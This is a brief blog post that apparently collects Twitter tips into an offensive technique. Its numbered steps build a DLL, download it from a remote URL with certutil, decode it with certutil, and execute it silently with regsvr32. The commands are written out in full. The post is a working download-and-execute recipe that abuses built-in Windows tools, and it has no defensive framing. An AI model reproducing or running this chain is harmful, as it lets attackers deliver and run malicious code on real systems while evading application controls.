Quick post putting together some twitter awesomeness
references:
https://twitter.com/subtee/status/888125678872399873
https://twitter.com/subTee/status/888071631528235010
https://twitter.com/malwaretechblog/status/733651527827623936
Let's do it
1. Create your DLL
2. Base64encode it (optional)
3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down
4. Base64decode the file with certutil
5. Execute the dll with regsvr32 regsvr32 /s /u mydll.dll
No comments:
Post a Comment